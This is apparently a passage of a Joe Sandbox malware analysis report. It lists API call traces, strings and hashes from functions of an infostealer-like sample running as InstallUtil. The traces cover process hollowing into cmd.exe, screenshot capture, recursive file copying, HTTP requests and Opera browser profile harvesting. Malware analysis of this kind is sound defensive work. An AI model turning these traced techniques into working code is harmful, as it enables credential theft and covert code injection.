                                                                                                                  • Associated: 00000004.00000002.2453722114.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_4_2_400000_InstallUtil.jbxd
                                                                                                                  Yara matches
                                                                                                                  Similarity
                                                                                                                  • API ID: String$AllocCreateFreeHeapInitializeInstanceTimeVariant$BlanketClearFileH_prolog3_catchH_prolog3_catch_InitProcessProxySecuritySystem_wtoi64lstrcpywsprintf
                                                                                                                  • String ID: %d/%d/%d %d:%d:%d$InstallDate$ROOT\CIMV2$Select * From Win32_OperatingSystem$Unknown$Unknown$Unknown$WQL
                                                                                                                  • API String ID: 2280294774-461178377
                                                                                                                  • Opcode ID: fe6b9a04deeaae94ce61e149b8f4aed9b6b3574a86b373e3e1773863a37c8a56
                                                                                                                  • Instruction ID: 9b83a2dca4a1b3c6c0afd6b9e082c19a49acb0dc1fc89349d09b2b61b6485616
                                                                                                                  • Opcode Fuzzy Hash: fe6b9a04deeaae94ce61e149b8f4aed9b6b3574a86b373e3e1773863a37c8a56
                                                                                                                  • Instruction Fuzzy Hash: F7418D71940209BBCB20CBD5DC89EEFBBBDEFC9B11F20411AF611A6190D7799941CB28
                                                                                                                  Function 0041C472 Relevance: 26.7, APIs: 13, Strings: 2, Instructions: 440COMMON
                                                                                                                  Download Yara Rule
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000004.00000002.2453722114.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 00000004.00000002.2453722114.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2453722114.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2453722114.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2453722114.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2453722114.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2453722114.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2453722114.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2453722114.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2453722114.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2453722114.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_4_2_400000_InstallUtil.jbxd
                                                                                                                  Yara matches
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID: /$UT
                                                                                                                  • API String ID: 0-1626504983
                                                                                                                  • Opcode ID: 94b155d6eae385495534a97f883fd4c918c0e8828a42b8e7b6cfe56aff5eeafa
                                                                                                                  • Instruction ID: 63eef66cd8fe0e336db70064ed11a5ad7b696d25642cb4984019eb1642be8bef
                                                                                                                  • Opcode Fuzzy Hash: 94b155d6eae385495534a97f883fd4c918c0e8828a42b8e7b6cfe56aff5eeafa
                                                                                                                  • Instruction Fuzzy Hash: 8E027DB19442698BDF21DF64CC807EEBBB5AF45304F0440EAD948AB242D7389EC5CF99
                                                                                                                  Function 00406963 Relevance: 24.7, APIs: 11, Strings: 3, Instructions: 161networkfileCOMMON
                                                                                                                  Download Yara Rule
                                                                                                                  APIs
                                                                                                                    • Part of subcall function 00410519: lstrcpyA.KERNEL32(00000000,?,?,00401D07,?,00417621), ref: 00410538
                                                                                                                    • Part of subcall function 00404AB6: ??_U@YAPAXI@Z.MSVCRT(00000400), ref: 00404AE8
                                                                                                                    • Part of subcall function 00404AB6: ??_U@YAPAXI@Z.MSVCRT(00000400), ref: 00404AEE
                                                                                                                    • Part of subcall function 00404AB6: ??_U@YAPAXI@Z.MSVCRT(00000400), ref: 00404AF4
                                                                                                                    • Part of subcall function 00404AB6: lstrlenA.KERNEL32(000000FF,00000000,?), ref: 00404B06
                                                                                                                    • Part of subcall function 00404AB6: InternetCrackUrlA.WININET(000000FF,00000000), ref: 00404B0E
                                                                                                                    • Part of subcall function 004104E7: lstrcpyA.KERNEL32(00000000,00000000,?,0041707B,004366CD,?,?,?,?,0041858F), ref: 0041050D
                                                                                                                  • InternetOpenA.WININET(?,00000001,00000000,00000000,00000000), ref: 004069C5
                                                                                                                  • StrCmpCA.SHLWAPI(?), ref: 004069DF
                                                                                                                  • InternetConnectA.WININET(?,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00406A0E
                                                                                                                  • HttpOpenRequestA.WININET(?,GET,?,00000000,00000000,-00400100,00000000), ref: 00406A4D
                                                                                                                  • InternetSetOptionA.WININET(00000000,0000001F,00010300,00000004), ref: 00406A7D
                                                                                                                  • HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 00406A88
                                                                                                                  • HttpQueryInfoA.WININET(00000000,00000013,?,?,00000000), ref: 00406AAC
                                                                                                                  • InternetReadFile.WININET(?,?,000007CF,?), ref: 00406B40
                                                                                                                  • InternetCloseHandle.WININET(?), ref: 00406B50
                                                                                                                  • InternetCloseHandle.WININET(?), ref: 00406B5C
                                                                                                                  • InternetCloseHandle.WININET(?), ref: 00406B68
                                                                                                                    • Part of subcall function 00410609: lstrlenA.KERNEL32(?,00000000,?,?,?,?,0041709C,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 0041061D
                                                                                                                    • Part of subcall function 00410609: lstrcpyA.KERNEL32(00000000,?,?,?,?,?,0041709C,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 00410645
                                                                                                                    • Part of subcall function 00410609: lstrcatA.KERNEL32(?,00000000,?,?,?,?,0041709C,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 00410650
                                                                                                                    • Part of subcall function 0041058D: lstrcpyA.KERNEL32(00000000,?,00000000,004170BA,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 004105BD
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000004.00000002.2453722114.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 00000004.00000002.2453722114.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2453722114.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2453722114.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2453722114.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2453722114.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2453722114.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2453722114.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2453722114.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2453722114.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2453722114.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_4_2_400000_InstallUtil.jbxd
                                                                                                                  Yara matches
                                                                                                                  Similarity
                                                                                                                  • API ID: Internet$lstrcpy$CloseHandleHttp$OpenRequestlstrlen$ConnectCrackFileInfoOptionQueryReadSendlstrcat
                                                                                                                  • String ID: ERROR$ERROR$GET
                                                                                                                  • API String ID: 3863758870-2509457195
                                                                                                                  • Opcode ID: 79b04129377c5d4d45bac19231039a55e3dc9a9d221fd602966d56bbc965de8a
                                                                                                                  • Instruction ID: 58d07afc169a1ce0b47171bb7ce7cc0903f1f08f96176c9b1f2a19a3da15bd67
                                                                                                                  • Opcode Fuzzy Hash: 79b04129377c5d4d45bac19231039a55e3dc9a9d221fd602966d56bbc965de8a
                                                                                                                  • Instruction Fuzzy Hash: 9D51AEB1A00269AFDF20EB60DC84AEEB7B9FB04304F0181B6F549B2190DA755EC59F94
                                                                                                                  Function 0040F54A Relevance: 24.6, APIs: 12, Strings: 2, Instructions: 130threadinjectionmemoryCOMMON
                                                                                                                  Download Yara Rule
                                                                                                                  APIs
                                                                                                                  • _memset.LIBCMT ref: 0040F57C
                                                                                                                  • CreateProcessA.KERNEL32(C:\Windows\System32\cmd.exe,004365A7,00000000,00000000,00000001,00000004,00000000,00000000,?,?,00000000,00000000,00000000), ref: 0040F5A0
                                                                                                                  • VirtualAlloc.KERNEL32(00000000,00000004,00001000,00000004), ref: 0040F5B2
                                                                                                                  • Wow64GetThreadContext.KERNEL32(?,00000000), ref: 0040F5C4
                                                                                                                  • ReadProcessMemory.KERNEL32(?,?,?,00000004,00000000), ref: 0040F5E2
                                                                                                                  • VirtualAllocEx.KERNEL32(?,?,?,00003000,00000040), ref: 0040F5F8
                                                                                                                  • ResumeThread.KERNEL32(?), ref: 0040F608
                                                                                                                  • WriteProcessMemory.KERNEL32(?,00000000,a-A,?,00000000), ref: 0040F627
                                                                                                                  • WriteProcessMemory.KERNEL32(?,?,?,?,00000000), ref: 0040F65D
                                                                                                                  • WriteProcessMemory.KERNEL32(?,?,?,00000004,00000000), ref: 0040F684
                                                                                                                  • Wow64SetThreadContext.KERNEL32(?,00000000), ref: 0040F696
                                                                                                                  • ResumeThread.KERNEL32(?), ref: 0040F69F
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000004.00000002.2453722114.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 00000004.00000002.2453722114.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2453722114.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2453722114.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2453722114.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2453722114.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2453722114.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2453722114.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2453722114.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2453722114.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2453722114.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_4_2_400000_InstallUtil.jbxd
                                                                                                                  Yara matches
                                                                                                                  Similarity
                                                                                                                  • API ID: Process$MemoryThread$Write$AllocContextResumeVirtualWow64$CreateRead_memset
                                                                                                                  • String ID: C:\Windows\System32\cmd.exe$a-A
                                                                                                                  • API String ID: 1428503023-431432405
                                                                                                                  • Opcode ID: e1ccbe8c928e2f1c21e5e7053cc7bb29076fa0b0443f7d3298dfd20d4594a4fa
                                                                                                                  • Instruction ID: 0d24e25234c3a3ad141f65fc29eb95852bfeeab9a63bd67a8dcfe51b88e854c0
                                                                                                                  • Opcode Fuzzy Hash: e1ccbe8c928e2f1c21e5e7053cc7bb29076fa0b0443f7d3298dfd20d4594a4fa
                                                                                                                  • Instruction Fuzzy Hash: B5413872A00208AFEB11DFA4DC85FAAB7B9FF48705F144475FA01E6161E776AD448B24
                                                                                                                  Function 00411F55 Relevance: 24.1, APIs: 16, Instructions: 147windowCOMMON
                                                                                                                  Download Yara Rule
                                                                                                                  APIs
                                                                                                                  • CreateStreamOnHGlobal.COMBASE(00000000,00000001,?), ref: 00411F96
                                                                                                                  • GetDesktopWindow.USER32 ref: 00411FA4
                                                                                                                  • GetWindowRect.USER32(00000000,?), ref: 00411FB1
                                                                                                                  • GetDC.USER32(00000000), ref: 00411FB8
                                                                                                                  • CreateCompatibleDC.GDI32(00000000), ref: 00411FC1
                                                                                                                  • CreateCompatibleBitmap.GDI32(00000000,?,?), ref: 00411FD1
                                                                                                                  • SelectObject.GDI32(?,00000000), ref: 00411FDE
                                                                                                                  • BitBlt.GDI32(?,00000000,00000000,?,?,00000000,00000000,00000000,00CC0020), ref: 00411FFA
                                                                                                                  • GetHGlobalFromStream.COMBASE(?,?), ref: 00412049
                                                                                                                  • GlobalLock.KERNEL32(?), ref: 00412052
                                                                                                                  • GlobalSize.KERNEL32(?), ref: 0041205E
                                                                                                                    • Part of subcall function 004104E7: lstrcpyA.KERNEL32(00000000,00000000,?,0041707B,004366CD,?,?,?,?,0041858F), ref: 0041050D
                                                                                                                    • Part of subcall function 00410519: lstrcpyA.KERNEL32(00000000,?,?,00401D07,?,00417621), ref: 00410538
                                                                                                                    • Part of subcall function 00405482: lstrlenA.KERNEL32(?), ref: 00405519
                                                                                                                    • Part of subcall function 00405482: StrCmpCA.SHLWAPI(?,00436986,0043697B,0043697A,0043696F), ref: 00405588
                                                                                                                    • Part of subcall function 00405482: InternetOpenA.WININET(?,00000001,00000000,00000000,00000000), ref: 004055AA
                                                                                                                  • SelectObject.GDI32(?,?), ref: 004120BC
                                                                                                                  • DeleteObject.GDI32(?), ref: 004120D7
                                                                                                                  • DeleteObject.GDI32(?), ref: 004120E0
                                                                                                                  • ReleaseDC.USER32(00000000,00000000), ref: 004120E8
                                                                                                                  • CloseWindow.USER32(00000000), ref: 004120EF
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000004.00000002.2453722114.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 00000004.00000002.2453722114.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2453722114.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2453722114.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2453722114.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2453722114.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2453722114.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2453722114.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2453722114.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2453722114.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2453722114.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_4_2_400000_InstallUtil.jbxd
                                                                                                                  Yara matches
                                                                                                                  Similarity
                                                                                                                  • API ID: GlobalObject$CreateWindow$CompatibleDeleteSelectStreamlstrcpy$BitmapCloseDesktopFromInternetLockOpenRectReleaseSizelstrlen
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 2610876673-0
                                                                                                                  • Opcode ID: bda296b1393527d1300f5fae4d52867722602398b487228bc4e84d997ee74abd
                                                                                                                  • Instruction ID: f6e3f0428e96004f8b83f7710fafbd9962f3d673da3a1d35a18d8dcfea6c860f
                                                                                                                  • Opcode Fuzzy Hash: bda296b1393527d1300f5fae4d52867722602398b487228bc4e84d997ee74abd
                                                                                                                  • Instruction Fuzzy Hash: 0251EA72800218AFDF15EFA1ED498EE7FBAFF08319F045525F901E2120E7369A55DB61
                                                                                                                  Function 00401D80 Relevance: 23.3, APIs: 12, Strings: 1, Instructions: 529fileCOMMON
                                                                                                                  Download Yara Rule
                                                                                                                  APIs
                                                                                                                    • Part of subcall function 004104E7: lstrcpyA.KERNEL32(00000000,00000000,?,0041707B,004366CD,?,?,?,?,0041858F), ref: 0041050D
                                                                                                                  • FindFirstFileA.KERNEL32(?,?,0043A9AC,0043A9B0,004369FA,004369F7,00417908,?,00000000), ref: 00401FA4
                                                                                                                  • StrCmpCA.SHLWAPI(?,0043A9B4), ref: 00401FD7
                                                                                                                  • StrCmpCA.SHLWAPI(?,0043A9B8), ref: 00401FF1
                                                                                                                  • FindFirstFileA.KERNEL32(?,?,0043A9BC,0043A9C0,?,0043A9C4,004369FB), ref: 004020DD
                                                                                                                  • CopyFileA.KERNEL32(?,?,00000001), ref: 004022C3
                                                                                                                    • Part of subcall function 00411DBC: SHGetFolderPathA.SHELL32(00000000,?,00000000,00000000,?,?,?), ref: 00411DFD
                                                                                                                    • Part of subcall function 004105C7: lstrcpyA.KERNEL32(00000000,?,0000000C,004175E9,004366DA), ref: 004105F5
                                                                                                                    • Part of subcall function 004105C7: lstrcatA.KERNEL32(?,?), ref: 004105FF
                                                                                                                    • Part of subcall function 0041058D: lstrcpyA.KERNEL32(00000000,?,00000000,004170BA,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 004105BD
                                                                                                                  • DeleteFileA.KERNEL32(?), ref: 00402336
                                                                                                                  • FindNextFileA.KERNEL32(?,?), ref: 004023A2
                                                                                                                  • FindClose.KERNEL32(?), ref: 004023B6
                                                                                                                  • CopyFileA.KERNEL32(?,?,00000001), ref: 004025DC
                                                                                                                    • Part of subcall function 00407FAC: CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,00000000,00000000,00000000,?,?,?,?,0040E756,?,?,?), ref: 00407FC7
                                                                                                                    • Part of subcall function 00407FAC: GetFileSizeEx.KERNEL32(00000000,?,?,?,?,?,0040E756,?,?,?), ref: 00407FDE
                                                                                                                    • Part of subcall function 00407FAC: LocalAlloc.KERNEL32(00000040,?,?,?,?,?,0040E756,?,?,?), ref: 00407FF5
                                                                                                                    • Part of subcall function 00407FAC: ReadFile.KERNEL32(?,00000000,?,?,00000000,?,?,?,?,0040E756,?,?,?), ref: 0040800C
                                                                                                                    • Part of subcall function 00407FAC: CloseHandle.KERNEL32(?,?,?,?,?,0040E756,?,?,?), ref: 00408034
                                                                                                                  • DeleteFileA.KERNEL32(?), ref: 0040264F
                                                                                                                    • Part of subcall function 00416E97: Sleep.KERNEL32(000003E8,?,?), ref: 00416EFE
                                                                                                                  • FindNextFileA.KERNEL32(?,?), ref: 004026C6
                                                                                                                  • FindClose.KERNEL32(?), ref: 004026DA
                                                                                                                    • Part of subcall function 00410519: lstrcpyA.KERNEL32(00000000,?,?,00401D07,?,00417621), ref: 00410538
                                                                                                                    • Part of subcall function 00416E97: CreateThread.KERNEL32(00000000,00000000,00416DC6,?,00000000,00000000), ref: 00416F36
                                                                                                                    • Part of subcall function 00416E97: WaitForSingleObject.KERNEL32(00000000,000003E8), ref: 00416F3E
                                                                                                                    • Part of subcall function 00410609: lstrlenA.KERNEL32(?,00000000,?,?,?,?,0041709C,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 0041061D
                                                                                                                    • Part of subcall function 00410609: lstrcpyA.KERNEL32(00000000,?,?,?,?,?,0041709C,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 00410645
                                                                                                                    • Part of subcall function 00410609: lstrcatA.KERNEL32(?,00000000,?,?,?,?,0041709C,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 00410650
                                                                                                                    • Part of subcall function 00411D92: GetFileAttributesA.KERNEL32(?,?,?,0040DA7F,?,?,?), ref: 00411D99
                                                                                                                    • Part of subcall function 00411C4A: GetSystemTime.KERNEL32(?,00436701,?), ref: 00411C79
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000004.00000002.2453722114.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 00000004.00000002.2453722114.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2453722114.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2453722114.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2453722114.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2453722114.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2453722114.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2453722114.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2453722114.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2453722114.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2453722114.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_4_2_400000_InstallUtil.jbxd
                                                                                                                  Yara matches
                                                                                                                  Similarity
                                                                                                                  • API ID: File$Find$lstrcpy$Close$CopyCreateDeleteFirstNextlstrcat$AllocAttributesFolderHandleLocalObjectPathReadSingleSizeSleepSystemThreadTimeWaitlstrlen
                                                                                                                  • String ID: \*.*
                                                                                                                  • API String ID: 1475085387-1173974218
                                                                                                                  • Opcode ID: 4a5b137c999928a75ba8bc4a6e6ab310dcd69db191c9960b432ed123b9b006a7
                                                                                                                  • Instruction ID: 84c523e9d2ff6d0b2cceb644b0baa1646f1dc192954122ea0c18f52f03966360
                                                                                                                  • Opcode Fuzzy Hash: 4a5b137c999928a75ba8bc4a6e6ab310dcd69db191c9960b432ed123b9b006a7
                                                                                                                  • Instruction Fuzzy Hash: 6C32EC71A401299BCF21FB25DD4A6CD7375AF04308F5100EAB548B71A1DBB86FC98F99
                                                                                                                  Function 0041543D Relevance: 22.9, APIs: 12, Strings: 1, Instructions: 140stringfileCOMMON
                                                                                                                  Download Yara Rule
                                                                                                                  APIs
                                                                                                                  • wsprintfA.USER32 ref: 0041546A
                                                                                                                  • FindFirstFileA.KERNEL32(?,?), ref: 00415481
                                                                                                                  • StrCmpCA.SHLWAPI(?,00436A80), ref: 004154A2
                                                                                                                  • StrCmpCA.SHLWAPI(?,00436A84), ref: 004154BC
                                                                                                                  • lstrcatA.KERNEL32(?), ref: 0041550D
                                                                                                                  • lstrcatA.KERNEL32(?), ref: 00415520
                                                                                                                  • lstrcatA.KERNEL32(?,?), ref: 00415534
                                                                                                                  • lstrcatA.KERNEL32(?,?), ref: 00415547
                                                                                                                  • lstrcatA.KERNEL32(?,00436A88), ref: 00415559
                                                                                                                  • lstrcatA.KERNEL32(?,?), ref: 0041556D
                                                                                                                    • Part of subcall function 004104E7: lstrcpyA.KERNEL32(00000000,00000000,?,0041707B,004366CD,?,?,?,?,0041858F), ref: 0041050D
                                                                                                                    • Part of subcall function 00407FAC: CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,00000000,00000000,00000000,?,?,?,?,0040E756,?,?,?), ref: 00407FC7
                                                                                                                    • Part of subcall function 00407FAC: GetFileSizeEx.KERNEL32(00000000,?,?,?,?,?,0040E756,?,?,?), ref: 00407FDE
                                                                                                                    • Part of subcall function 00407FAC: LocalAlloc.KERNEL32(00000040,?,?,?,?,?,0040E756,?,?,?), ref: 00407FF5
                                                                                                                    • Part of subcall function 00407FAC: ReadFile.KERNEL32(?,00000000,?,?,00000000,?,?,?,?,0040E756,?,?,?), ref: 0040800C
                                                                                                                    • Part of subcall function 00407FAC: CloseHandle.KERNEL32(?,?,?,?,?,0040E756,?,?,?), ref: 00408034
                                                                                                                    • Part of subcall function 00416E97: CreateThread.KERNEL32(00000000,00000000,00416DC6,?,00000000,00000000), ref: 00416F36
                                                                                                                    • Part of subcall function 00416E97: WaitForSingleObject.KERNEL32(00000000,000003E8), ref: 00416F3E
                                                                                                                  • FindNextFileA.KERNEL32(?,?), ref: 00415623
                                                                                                                  • FindClose.KERNEL32(?), ref: 00415637
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000004.00000002.2453722114.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 00000004.00000002.2453722114.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2453722114.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2453722114.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2453722114.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2453722114.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2453722114.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2453722114.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2453722114.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2453722114.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2453722114.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_4_2_400000_InstallUtil.jbxd
                                                                                                                  Yara matches
                                                                                                                  Similarity
                                                                                                                  • API ID: lstrcat$File$Find$CloseCreate$AllocFirstHandleLocalNextObjectReadSingleSizeThreadWaitlstrcpywsprintf
                                                                                                                  • String ID: %s\%s
                                                                                                                  • API String ID: 1150833511-4073750446
                                                                                                                  • Opcode ID: 2e0bb3d38ea62b5c105b61d514d6becb3cb91e1da354d02d3ddcedb69e666a60
                                                                                                                  • Instruction ID: 7b4a02d1ce16c29d0e311cc455c9dd4e2592c9f450b56a316f79c40a9e4a8b0e
                                                                                                                  • Opcode Fuzzy Hash: 2e0bb3d38ea62b5c105b61d514d6becb3cb91e1da354d02d3ddcedb69e666a60
                                                                                                                  • Instruction Fuzzy Hash: 71515FB190021D9BCF64DF60CC89AC9B7BDAB48305F1045E6E609E3250EB369B89CF65
                                                                                                                  Function 0040BF4D Relevance: 19.7, APIs: 7, Strings: 4, Instructions: 420fileCOMMON
                                                                                                                  Download Yara Rule
                                                                                                                  APIs
                                                                                                                    • Part of subcall function 004104E7: lstrcpyA.KERNEL32(00000000,00000000,?,0041707B,004366CD,?,?,?,?,0041858F), ref: 0041050D
                                                                                                                    • Part of subcall function 004105C7: lstrcpyA.KERNEL32(00000000,?,0000000C,004175E9,004366DA), ref: 004105F5
                                                                                                                    • Part of subcall function 004105C7: lstrcatA.KERNEL32(?,?), ref: 004105FF
                                                                                                                    • Part of subcall function 00410609: lstrlenA.KERNEL32(?,00000000,?,?,?,?,0041709C,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 0041061D
                                                                                                                    • Part of subcall function 00410609: lstrcpyA.KERNEL32(00000000,?,?,?,?,?,0041709C,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 00410645
                                                                                                                    • Part of subcall function 00410609: lstrcatA.KERNEL32(?,00000000,?,?,?,?,0041709C,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 00410650
                                                                                                                    • Part of subcall function 0041058D: lstrcpyA.KERNEL32(00000000,?,00000000,004170BA,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 004105BD
                                                                                                                  • FindFirstFileA.KERNEL32(?,?,\*.*,0043682E,0040CC6B,?,?), ref: 0040BFC5
                                                                                                                  • StrCmpCA.SHLWAPI(?,00437470), ref: 0040BFE5
                                                                                                                  • StrCmpCA.SHLWAPI(?,00437474), ref: 0040BFFF
                                                                                                                  • StrCmpCA.SHLWAPI(?,Opera,00436843,00436842,00436837,00436836,00436833,00436832,0043682F), ref: 0040C08B
                                                                                                                  • StrCmpCA.SHLWAPI(?,Opera GX), ref: 0040C099
                                                                                                                  • StrCmpCA.SHLWAPI(?,Opera Crypto), ref: 0040C0A7
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000004.00000002.2453722114.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 00000004.00000002.2453722114.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2453722114.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2453722114.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
